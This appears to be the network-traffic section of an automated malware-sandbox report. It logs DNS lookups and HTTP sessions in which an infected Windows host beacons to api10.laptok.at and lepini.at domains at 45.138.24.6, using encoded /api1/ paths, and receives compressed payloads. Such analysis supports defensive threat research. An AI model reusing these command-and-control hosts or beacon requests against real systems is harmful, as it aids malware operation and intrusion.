Jan 22, 2021 10:22:25.736314058 CET	192.168.2.4	8.8.8.8	0xccc2	Standard query (0)	web.vortex.data.msn.com	A (IP address)	IN (0x0001)
Jan 22, 2021 10:22:26.317377090 CET	192.168.2.4	8.8.8.8	0xe304	Standard query (0)	contextual.media.net	A (IP address)	IN (0x0001)
Jan 22, 2021 10:22:27.457756042 CET	192.168.2.4	8.8.8.8	0xf709	Standard query (0)	lg3.media.net	A (IP address)	IN (0x0001)
Jan 22, 2021 10:22:28.109246969 CET	192.168.2.4	8.8.8.8	0xa51b	Standard query (0)	hblg.media.net	A (IP address)	IN (0x0001)
Jan 22, 2021 10:22:28.669420004 CET	192.168.2.4	8.8.8.8	0xa0ef	Standard query (0)	cvision.media.net	A (IP address)	IN (0x0001)
Jan 22, 2021 10:22:28.935030937 CET	192.168.2.4	8.8.8.8	0x2940	Standard query (0)	srtb.msn.com	A (IP address)	IN (0x0001)
Jan 22, 2021 10:22:30.030206919 CET	192.168.2.4	8.8.8.8	0xaf37	Standard query (0)	img.img-taboola.com	A (IP address)	IN (0x0001)
Jan 22, 2021 10:23:53.614837885 CET	192.168.2.4	8.8.8.8	0x613b	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Jan 22, 2021 10:24:00.498025894 CET	192.168.2.4	8.8.8.8	0x1887	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Jan 22, 2021 10:24:07.806113958 CET	192.168.2.4	8.8.8.8	0x93ba	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Jan 22, 2021 10:25:02.319375992 CET	192.168.2.4	8.8.8.8	0xdc86	Standard query (0)	c56.lepini.at	A (IP address)	IN (0x0001)
Jan 22, 2021 10:25:07.208496094 CET	192.168.2.4	8.8.8.8	0x5bc3	Standard query (0)	resolver1.opendns.com	A (IP address)	IN (0x0001)
Jan 22, 2021 10:25:07.763724089 CET	192.168.2.4	8.8.8.8	0xdf50	Standard query (0)	resolver1.opendns.com	A (IP address)	IN (0x0001)
Jan 22, 2021 10:25:07.766397953 CET	192.168.2.4	8.8.8.8	0x6886	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)
Jan 22, 2021 10:25:08.989173889 CET	192.168.2.4	8.8.8.8	0x6b43	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)
Jan 22, 2021 10:25:20.199268103 CET	192.168.2.4	8.8.8.8	0x8c66	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 22, 2021 10:22:23.359330893 CET	8.8.8.8	192.168.2.4	0x9158	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Jan 22, 2021 10:22:25.808186054 CET	8.8.8.8	192.168.2.4	0xccc2	No error (0)	web.vortex.data.msn.com	web.vortex.data.microsoft.com		CNAME (Canonical name)	IN (0x0001)
Jan 22, 2021 10:22:26.385763884 CET	8.8.8.8	192.168.2.4	0xe304	No error (0)	contextual.media.net		104.84.56.24	A (IP address)	IN (0x0001)
Jan 22, 2021 10:22:27.522135019 CET	8.8.8.8	192.168.2.4	0xf709	No error (0)	lg3.media.net		104.84.56.24	A (IP address)	IN (0x0001)
Jan 22, 2021 10:22:28.173569918 CET	8.8.8.8	192.168.2.4	0xa51b	No error (0)	hblg.media.net		104.84.56.24	A (IP address)	IN (0x0001)
Jan 22, 2021 10:22:28.729680061 CET	8.8.8.8	192.168.2.4	0xa0ef	No error (0)	cvision.media.net	cvision.media.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Jan 22, 2021 10:22:28.985711098 CET	8.8.8.8	192.168.2.4	0x2940	No error (0)	srtb.msn.com	www.msn.com		CNAME (Canonical name)	IN (0x0001)
Jan 22, 2021 10:22:28.985711098 CET	8.8.8.8	192.168.2.4	0x2940	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Jan 22, 2021 10:22:30.087997913 CET	8.8.8.8	192.168.2.4	0xaf37	No error (0)	img.img-taboola.com	tls13.taboola.map.fastly.net		CNAME (Canonical name)	IN (0x0001)
Jan 22, 2021 10:22:30.087997913 CET	8.8.8.8	192.168.2.4	0xaf37	No error (0)	tls13.taboola.map.fastly.net		151.101.1.44	A (IP address)	IN (0x0001)
Jan 22, 2021 10:22:30.087997913 CET	8.8.8.8	192.168.2.4	0xaf37	No error (0)	tls13.taboola.map.fastly.net		151.101.65.44	A (IP address)	IN (0x0001)
Jan 22, 2021 10:22:30.087997913 CET	8.8.8.8	192.168.2.4	0xaf37	No error (0)	tls13.taboola.map.fastly.net		151.101.129.44	A (IP address)	IN (0x0001)
Jan 22, 2021 10:22:30.087997913 CET	8.8.8.8	192.168.2.4	0xaf37	No error (0)	tls13.taboola.map.fastly.net		151.101.193.44	A (IP address)	IN (0x0001)
Jan 22, 2021 10:23:53.940606117 CET	8.8.8.8	192.168.2.4	0x613b	No error (0)	api10.laptok.at		45.138.24.6	A (IP address)	IN (0x0001)
Jan 22, 2021 10:24:00.554508924 CET	8.8.8.8	192.168.2.4	0x1887	No error (0)	api10.laptok.at		45.138.24.6	A (IP address)	IN (0x0001)
Jan 22, 2021 10:24:08.141377926 CET	8.8.8.8	192.168.2.4	0x93ba	No error (0)	api10.laptok.at		45.138.24.6	A (IP address)	IN (0x0001)
Jan 22, 2021 10:25:02.376198053 CET	8.8.8.8	192.168.2.4	0xdc86	No error (0)	c56.lepini.at		45.138.24.6	A (IP address)	IN (0x0001)
Jan 22, 2021 10:25:07.256606102 CET	8.8.8.8	192.168.2.4	0x5bc3	No error (0)	resolver1.opendns.com		208.67.222.222	A (IP address)	IN (0x0001)
Jan 22, 2021 10:25:07.814851046 CET	8.8.8.8	192.168.2.4	0xdf50	No error (0)	resolver1.opendns.com		208.67.222.222	A (IP address)	IN (0x0001)
Jan 22, 2021 10:25:08.180428982 CET	8.8.8.8	192.168.2.4	0x6886	No error (0)	api3.lepini.at		45.138.24.6	A (IP address)	IN (0x0001)
Jan 22, 2021 10:25:09.048562050 CET	8.8.8.8	192.168.2.4	0x6b43	No error (0)	api3.lepini.at		45.138.24.6	A (IP address)	IN (0x0001)
Jan 22, 2021 10:25:20.255620956 CET	8.8.8.8	192.168.2.4	0x8c66	No error (0)	api3.lepini.at		45.138.24.6	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

api10.laptok.at

c56.lepini.at

api3.lepini.at

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49792	45.138.24.6	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jan 22, 2021 10:23:54.006242990 CET	8386	OUT	GET /api1/sknLedsCbT_2B4wLtS_2FSf/C8Q4jriZvv/cHfqhQ9vl0vZGO5GP/AoJz8AHspssc/PRZs4sKJRg7/jH1SdHxUwyz5RQ/XuBuvpY5vvQV4LqIVVPRo/Z9PjsLKqohem6vf_/2FPMNyhDVIs00yE/BuUcdk1zY69hPWFKWm/NvZlHdA31/78WizcFNxnStriaFjzK7/v_2FVVwIwtM_2F54f79/vZDSa6ivA8gkZONEyW9488/C4H0pr8tv19LW/ZXxXdBMw/kw85mxmCjJ_2Bu32ObSyLwF/Yo3etxqqFR/p7BRLvnXvFdgAAGGn/C_2BCacpFUZ1/tah HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Jan 22, 2021 10:23:54.648138046 CET	8396	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 22 Jan 2021 09:23:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9b c5 56 c3 50 14 45 3f 28 83 b8 0d e3 d2 58 e3 c9 2c ee ee f9 7a ca 10 58 40 f3 de bd e7 ec 4d 17 6a 83 36 11 ba 09 45 3a 6f fc 82 10 87 26 24 a7 da 2f 64 78 97 df e6 bb 28 a9 4f 79 74 c1 a3 bb 49 bb bb 69 3e 2b 21 40 be 7b 08 c8 3e 8b 7c 37 05 fe 07 16 f6 38 71 06 9e 83 a4 6a 96 3e 45 ab 5b 3e 22 7a 04 1b 1b a4 76 7e b6 2f e8 0f 74 23 58 f4 a3 fb f6 7e dd c7 18 86 76 70 99 10 eb 13 e9 74 a9 e5 70 9b 03 59 cb 77 5c 96 74 71 1a 3b bd 00 ec ab f4 14 19 0d 10 33 d3 ab 4c 82 c6 87 9f 3f 6c 73 d6 11 36 22 04 32 45 50 db 14 75 8f ab d8 ce 86 0c 95 09 39 c7 c0 3b 66 57 10 9c e9 6d b4 4c 50 39 1a 20 17 e5 8a 93 98 70 bc 6c 76 ee 21 2b 7a 44 5f 72 39 3f 0a fc 6e 48 99 86 12 dc 68 09 83 32 98 7f e3 c6 94 e4 af 61 b5 3e e3 0f 7c 3a 07 6b 6f 4c 1c 24 62 87 8d 55 aa db e5 18 93 3b b3 59 74 a9 98 98 9f 8e 99 3f a3 fd ac 6b cd 69 da fa dd f4 a7 79 cf a1 14 a8 77 d0 bc 43 79 23 37 e0 99 20 88 6f a8 20 c4 15 7e 61 c1 d8 b7 51 22 c8 c8 8f bf da 22 d6 bc 80 58 1b b3 b8 ca be dc 69 a9 9d 8a 55 d1 f1 11 da 47 9d 98 df 9c 9d 1b b6 bf 81 07 d8 87 e6 f3 f1 15 4d 96 21 08 9c ee 97 6c 75 d9 4c d2 ad 30 f5 4a 17 d3 76 2b c1 0f 8d 88 d9 d7 61 48 55 f4 55 59 ab 0e 3b 13 47 b7 5c 4c 76 f5 7a a0 97 93 d8 79 4e 6e f5 34 e5 9d 45 9c fb 10 74 7e 95 b9 0a 28 b4 02 c3 00 55 1e 80 a2 cd 96 00 e5 11 bb 3b 25 c5 96 01 3c 25 b1 10 13 af e9 63 9f 22 20 7d c5 78 ec 42 fe 96 c9 a4 91 4b 0e 84 69 4e 8e 4d ee 77 d3 ee 7e b9 c9 b8 fb c9 bd 99 5d 9c f8 1c a1 48 5b ba bb e9 eb 77 2e ac 68 fd 0a b6 18 d3 e7 0e ed 06 99 7a 54 fd b8 c9 06 58 6e 8d eb 4d 01 78 90 11 ee e6 99 ab 30 ea 38 ba e9 d7 ad ad dd d5 0f 35 87 2e dd eb 1b 03 5d 95 73 9b 83 60 55 d1 e0 60 50 2d 85 d6 84 0c ea dc cc bf 96 07 ad c0 94 f9 6a b3 e1 e5 17 f0 ce 0b 5c 68 a3 89 6a 3d e4 2a ae c4 3d c4 1d 23 96 e6 3b a6 38 7c 8a 2c 2f 98 65 f5 1c 81 bf b4 a7 41 80 f8 44 57 34 37 95 d5 a7 de 77 db 23 cb 47 eb d5 2a 79 74 91 b6 e9 9b 12 d9 31 4c 12 d2 3d bf 63 fd 32 db b2 09 1f e4 ca 8d 7b b1 48 3e 5c 16 28 ba 98 eb db c7 4f a6 63 e2 ab 8c 07 87 88 e5 92 15 c1 13 87 9d 78 a7 4b 90 6c 5d de a9 f3 11 68 6f 31 06 05 05 01 8d 27 fa d4 7b d7 d2 3e c0 fd 02 5d 43 9e 41 a0 8b 6e 00 00 e3 ec 7a 7f 97 f5 83 00 33 de 2b f8 d4 91 6b 51 4a 00 1c 28 50 aa ce 23 1c 9a 2f fb 4e 44 76 39 3e e6 9e 1e 87 24 4a 40 b6 5c d5 2c b2 32 44 fe ba 53 7d c5 01 f9 e3 e5 12 ca 76 b9 70 e4 ed b9 a7 17 85 0f ee e9 74 90 18 3f 87 68 1d 11 61 b6 86 04 13 ea 5b d6 38 7c 85 6b 28 46 e6 1a df d2 d9 c2 50 0b 27 47 72 fb bd 82 ee dc 27 18 05 8f df b0 4f 25 ef dc 57 90 57 8b 62 55 4f 1c 1a 44 89 04 32 7f 8a c9 68 cb f1 15 a7 d6 36 45 9e 06 ba a5 be 53 7e 3d ce 07 ac 9a 87 4e bf c3 62 cd 1c c2 20 6e 7b 4b e2 1d f2 91 a1 b9 f3 f0 94 d3 30 a8 d4 f9 15 98 3e b1 d9 fb cc 3d 99 cb 98 32 3e ab 9a 4b f6 99 e7 74 21 28 2f 30 dc 49 24 9d ab 83 e8 b6 85 58 c5 8f 9d c3 06 73 2c 7b 65 3e 5a 3f 10 a0 bb 82 5b 98 2c 3e ba ae 34 02 23 2b 28 1f 3c 31 56 ae a3 51 b7 6f 2d 35 d6 42 44 6f be 7d 2c 0d 8b f1 ed d2 7a b5 25 c6 c7 b9 2d 77 d5 0d a6 17 b8 00 55 1c 5e 6f 34 73 be b1 1f 58 df b4 97 77 7c 4d df ac 33 a1 18 e8 df cf ea 7d 16 4c f0 a8 ad bb Data Ascii: 2000VPE?(X,zX@Mj6E:o&$/dx(OytIi>+!@{>\|78qj>E[>"zv~/t#X~vptpYw\tq;3L?ls6"2EPu9;fWmLP9 plv!+zD_r9?nHh2a>\|:koL$bU;Yt?kiywCy#7 o ~aQ""XiUGM!luL0Jv+aHUUY;G\LvzyNn4Et~(U;%<%c" }xBKiNMw~]H[w.hzTXnMx085.]s`U`P-j\hj==#;8\|,/eADW47w#Gyt1L=c2{H>\(OcxKl]ho1'{>]CAnz3+kQJ(P#/NDv9>$J@\,2DS}vpt?ha[8\|k(FP'Gr'O%WWbUOD2h6ES~=Nb n{K0>=2>Kt!(/0I$Xs,{e>Z?[,>4#+(<1VQo-5BDo},z%-wU^o4sXw\|M3}L

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49793	45.138.24.6	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jan 22, 2021 10:23:58.848748922 CET	8688	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: api10.laptok.at Connection: Keep-Alive
Jan 22, 2021 10:23:59.098011971 CET	8689	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 22 Jan 2021 09:23:59 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49796	45.138.24.6	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jan 22, 2021 10:24:00.613425970 CET	8718	OUT	GET /api1/8t0bR6VsCGA/ZdsVj6T4k_2FoN/BLdu_2BpSFXqKfcNrQm0V/ev0hudV9ITNV8_2B/N1NUzrdZB3VXtwr/czINvqLVnHAqL34hBx/_2F4Uw8ch/lO8_2BdQScLQi_2B7dkM/Y6U5VEgT5klQ01W1Rxk/oP4yI983nfNNLWO0FdmkwO/SlYApRJyCflSJ/F9Sp1wFu/11p6fGFU0cz_2F0ouRmTqJI/Jp2cYIM8B8/Yut84Zr03wWkVJ8HW/_2Bs4q032lo5/cXLpMBT2Oue/wmMCk0Do0CwkFa/R5_2BwVrdhg4SycoUpM1q/WdY_2FMtLacKdQm6/_2B87YclJ9Jv74j/B_2BPGCFKoDrv4QA/twu HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Jan 22, 2021 10:24:01.310352087 CET	8728	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 22 Jan 2021 09:24:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 99 c5 96 a4 40 10 45 3f 88 05 6e 4b dc a1 71 d9 e1 ee ce d7 4f cd ba 4f 75 41 66 c4 7b f7 9e 6a 42 cd cd 5a 02 ce 25 1c 0f d1 8c d0 91 bb 84 13 19 f9 bb c2 5d 7b a8 a8 ad 77 03 19 cd b8 70 a9 60 06 44 d7 15 30 5d bc a7 13 c7 25 ca 02 0c 9e 93 e6 81 cb c5 10 0d cc 74 df 8c 5d 92 a9 06 20 94 47 09 a3 3a 9f 4e 47 8d e7 71 2f 01 ad 90 3a 14 06 fe d4 f4 44 67 a9 49 f5 ae 73 62 ae 62 e2 c0 83 17 25 c7 f0 57 89 31 e0 24 3a 0f af 1a 1f 8a 29 6f 37 91 10 62 c7 47 0f 15 ca 14 98 ed e6 74 d8 f7 c4 c3 1d 99 47 62 37 1f cb 31 6d 7e 68 4c 98 a3 2f 6d 1b 55 5a b5 83 1b e8 68 28 b4 2c c0 7b a2 0f 8d 11 15 16 d7 e0 b0 67 e3 29 e4 79 a0 f2 1e 53 5e 9a f3 1c 16 ba b8 dc 0b 95 30 57 ff 43 bf fd 74 04 32 7f 51 bc 43 99 e8 4b 56 22 cf b4 7c 67 b3 2a f3 bd 45 8e 5e 84 63 83 85 66 67 80 16 ff 6e 11 99 3b 22 65 3c 16 b1 af 82 f1 bd c0 bc 20 fd 16 0a f1 39 a9 07 28 24 fe 88 27 94 84 69 92 4a fd 49 08 fe 36 ce 7d 71 47 07 62 1e cc 83 11 3c 88 da 76 b5 a7 13 a5 2d d8 ce a9 02 49 2c 39 d1 06 e7 3a fe 44 c3 a7 eb c3 a3 3c 12 66 f0 01 cc e7 32 b4 cc 0d 98 da 0e b6 d6 a9 3c 48 72 5f 9e bc d4 79 5e 77 71 dc 54 ac 7c e0 e0 ce 58 4e b0 59 ec b8 4c 91 ca 0b 0f be b4 57 08 17 9c 70 37 87 3b e3 89 ba 76 b7 81 d4 89 ce f8 8c a9 05 de 92 14 a8 de b4 b8 b7 e1 aa d1 27 c0 5d 5c 6c 5f 92 f9 82 ae 83 4f b6 9f 47 f4 de a1 8e ee 23 72 2d 05 18 90 e5 34 b7 d6 0b d6 01 10 e8 45 72 b1 a8 22 fd 73 b0 85 3d 19 26 27 55 d3 5d b5 05 51 78 e5 6b 70 ca 85 1f 94 c7 b5 6a c6 2c 18 f7 fd 27 4a f4 9e ac a1 ce e3 c9 e8 22 37 5f 5d bb dd 86 9f 90 06 79 5d 26 cd bc b3 02 9e 1e cc 39 fa 0b 37 80 4b 53 cb ce 62 94 3c e2 dd 5b d1 64 8e 88 5b b6 ff 3a a9 c2 e1 fe 9d 28 98 3f f6 e8 f1 06 fc 66 89 bf 30 0e 26 48 a6 df 39 2d b2 98 50 eb 64 ce 02 46 46 f1 f8 3b 82 0c 11 9e 34 e4 47 49 2f 0b d4 6a 56 ca 1d 5d f1 ab 91 d3 82 0a 07 2a 71 24 09 a5 6d 47 f9 ae 80 57 ec 63 60 8d fe cd b4 e8 42 93 d4 92 1f bc 82 52 f4 9b a8 0a 38 37 21 7e 57 42 2b 89 80 0f c5 b5 66 81 96 87 54 eb d4 bc 2f d3 7a e7 e3 ee 41 12 be d5 d4 0f d8 d9 a0 74 81 3c c6 6a 0c db 96 bd 05 01 41 65 0c ad 7d 66 90 cc 6d ba 8c 3a 5e 67 30 4c 80 08 a7 b0 18 1a ec 8b 24 5a 26 c8 bd 74 28 22 47 c7 ef 7e ae a0 d2 fe 00 ae 4a 99 fb ec 71 8f f8 ca 7c f3 c5 94 22 33 da d3 ee be 3b 43 6e b8 63 c6 e0 06 0a 15 d1 47 e7 a3 e4 69 6a 95 e1 58 3a 39 bf 3f 61 e1 2f 8d 83 e1 07 81 7d b8 34 bd 7c 2e 59 27 b0 e7 6c ee 2d 51 00 d2 17 01 95 3b 1b 23 3e 51 53 70 72 11 e2 c6 37 ed 63 05 6e b1 38 ce c5 3d 99 f7 c9 97 dc 2b 9b 8e 9c 0a 72 6a e0 55 c8 e4 3d c3 55 10 8e 56 eb 6d 25 9b 37 66 09 e8 77 58 4f 01 09 6d fd 34 3c d4 a5 05 4c 4d 16 2a db b3 a1 25 4b 1f 39 1a c9 d6 64 ce 68 f7 09 28 8c 5e 1d de f1 41 fb e7 af 5c 0b 7e 09 e1 dc 93 71 89 ff a3 ab 48 b8 ee 8b 55 9e cb 05 9a ba 2c fd d4 98 4a 66 bf 5a ae 9c 90 ad 2e 98 d3 d7 c9 51 63 fd 64 c7 6f 7e 98 4b 92 27 8d 7b a2 41 06 d7 15 b1 7a af 0b dd 82 84 ef 41 59 fd f3 04 d4 a8 d5 de 38 fd db db 58 87 08 28 27 fc 93 92 5a 0e ba d6 63 d9 a6 ac 63 b7 f1 3c 9c ed d4 4c c6 44 2d bf ef f9 0b 95 7e 6a 8c f9 2f a3 7e 2b fc 27 63 70 59 c6 07 fa c5 95 dd 57 5a d8 c4 83 3e d4 e9 f4 34 4b 39 15 Data Ascii: 2000@E?nKqOOuAf{jBZ%]{wp`D0]%t] G:NGq/:DgIsbb%W1$:)o7bGtGb71m~hL/mUZh(,{g)yS^0WCt2QCKV"\|gE^cfgn;"e< 9($'iJI6}qGb<v-I,9:D<f2<Hr_y^wqT\|XNYLWp7;v']\l_OG#r-4Er"s=&'U]Qxkpj,'J"7_]y]&97KSb<[d[:(?f0&H9-PdFF;4GI/jV]q$mGWc`BR87!~WB+fT/zAt<jAe}fm:^g0L$Z&t("G~Jq\|"3;CncGijX:9?a/}4\|.Y'l-Q;#>QSpr7cn8=+rjU=UVm%7fwXOm4<LM*%K9dh(^A\~qHU,JfZ.Qcdo~K'{AzAY8X('Zcc<LD-~j/~+'cpYWZ>4K9

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49797	45.138.24.6	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jan 22, 2021 10:24:06.273139000 CET	9040	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: api10.laptok.at Connection: Keep-Alive
Jan 22, 2021 10:24:06.517229080 CET	9041	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 22 Jan 2021 09:24:06 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49798	45.138.24.6	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jan 22, 2021 10:24:08.208430052 CET	9042	OUT	GET /api1/CVkO0YtaI5O0rIFRU/dT4qwboWJixM/lD45ufaeNnI/cacgVxu7PaX2PX/1lYOIQMGvnkM47oJxaNOf/hFcn44i0YUVm90w4/QXHrnAASK_2F13d/5oQ_2F_2FIecjTnC8w/7KFf5o_2B/DvKXcUwkTj3k34oyPZ_2/BQTne0TWIY5r0yyHLCZ/QdvKBv0OKuZfpJiCfSiXDe/gwqygzT9hF5O5/iOEj4dxL/R_2FX_2Fv0bMpcldKbASVEW/DM59OBVxq7/9d4nMpuM8bNhV0TMy/RR84HPz6HIaw/UUGT2Q4OKHA/IoB4n4vcvYeMKu/tNuRkRQ0aDraFPOIy8Iid/GXrqJWUbrs/H HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Jan 22, 2021 10:24:08.639508963 CET	9044	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 22 Jan 2021 09:24:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 37 35 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 95 b5 81 83 50 00 40 07 a2 20 90 8f 95 b8 4b 70 e8 70 77 67 fa bb 1d 9e 94 4e 86 7e 9c 25 ca f9 98 b0 b8 50 c2 c3 cc bf d7 99 6e 8b 3b 90 25 83 b5 5d 2c 7f c0 3b ff 9c 93 e3 1b f4 43 ca 5d bd dd 86 a8 9f 4b 65 99 53 9d 88 33 78 28 8b f7 e7 a4 9a 49 88 f8 84 cd 76 f2 bd 7b d5 4b e7 59 aa e9 2c 01 b8 ad 86 66 ac 99 52 ef ed 66 f3 79 88 e4 7b 91 bc c3 0c a6 2e e0 8c 11 33 fc 25 a8 17 f9 98 34 64 a3 fb 54 ca 88 b4 fd 48 29 12 81 7e b3 d9 96 d3 2f 38 10 8c 73 3b 3a 55 dd 60 64 e7 59 4c f7 bc 8e 9f d4 57 01 3f a0 6c d1 d0 d3 f4 0c 97 a9 2c 35 bc 4a 60 b6 4e 1a 7b 0c ed 74 b1 8e 2f 92 af b4 32 c7 95 c4 61 7c f8 1c 61 ea 8a ba 18 86 1f fb 7b 79 c3 5c ef 32 cd f7 5a db ea 81 a5 94 eb 07 6f 64 08 05 ed 34 b7 ac e1 f1 af 2c 7c 20 7f 66 20 e1 87 9d 32 62 4d af 06 67 62 f8 29 e1 fa a7 ae 21 45 b1 19 d1 d9 ca ce 85 30 7d 7f ae 54 f3 81 b2 54 33 97 7a b4 65 0a 5c 66 88 5e 2d 16 bf e7 19 e7 93 df b2 1a c8 a3 9c f4 cc 72 81 70 ae 4d d8 74 00 61 ca 44 5d 1b de ca 08 2f bd 23 f2 8f 03 4f 36 f4 1d b1 ae 09 8a 5e 1a 0a 68 10 63 fa 2c 51 78 74 1b b1 18 43 04 0e 85 2d 61 78 22 f1 f3 7b 5a c2 75 34 ec 3a 99 c0 f1 38 7c 13 5f 99 8a be 71 95 a4 49 0e 09 82 15 39 9d 6d 92 b3 53 4c ce 55 a3 1a 58 14 52 eb 5c c5 c1 ec c5 98 34 7b e8 99 51 8d 14 38 03 35 ea 63 2b b5 bf a6 49 90 97 f3 1c 05 f3 16 a5 92 0b 78 90 88 90 58 49 47 41 4f 5a 62 28 b1 b9 68 e2 e9 4b 6c 44 be da 58 d5 a8 cf 51 f5 1d dc 09 b7 e3 3a d9 4c 52 be 23 1f 35 e9 3e 7d 8c f5 8d 9e ca 14 29 74 ba e3 4c a4 2e 6a 94 50 ee 95 a2 31 bf 00 8e fb 20 1b 8c 02 ab 5c bb 12 81 9b 23 ef 62 77 96 81 7d a7 fc 44 5f 85 c3 c2 75 c1 8f b3 86 72 89 c9 bf 17 96 0d b3 86 4d 3f 61 f3 a9 8b 5a ca 15 25 5f 6a 97 11 a4 15 2f 54 ed 06 fd 6d 6a db a9 3f 02 72 ed 01 84 f6 b4 3b 3a 51 8a 5a 48 9c 13 4e e0 21 c1 d6 13 fe a6 49 f9 0b 28 6e 7f bf a8 bd 08 48 19 c5 9a bf 5d 1a fc 20 b6 fa 4c c7 cc b3 5d e7 ed 6e ae 79 4a 01 01 fc 8d f1 92 72 91 fd 55 eb fb 60 75 66 8f 50 b8 66 54 69 c5 fc 58 8b 60 76 61 8c 3d 69 19 56 09 18 04 30 4f d8 43 ad b6 3a e7 2b 3e 93 48 60 c5 ab de 2c b4 13 40 b4 87 39 d7 e0 f4 ca ec a5 66 88 88 49 d7 6f 05 8e 4b 8d 0d b1 d2 75 3e a6 f4 ae b9 b0 40 a3 f3 f6 09 cd d1 89 75 21 76 f2 2d 8d 37 d7 59 c9 d6 0d 89 10 a7 ce ee 41 64 5a ef 72 cd 8a a8 cf 35 1b 33 3d fa a6 c7 c3 9f f7 9f 7b f1 45 e1 cf 43 af fe f1 8d 40 15 3a 7a 02 8f 1f 7a 96 b2 b5 cc 1c 75 1a 2e 80 9e a7 10 4f aa 5c c1 bc 9e 91 33 ac b1 a7 5b f9 1e f4 9a 21 2b 3e 2b 3f f9 2a 0f 92 2c 79 46 29 94 f4 20 a7 a1 76 14 9f ef 20 55 eb 06 b8 e1 e2 62 f3 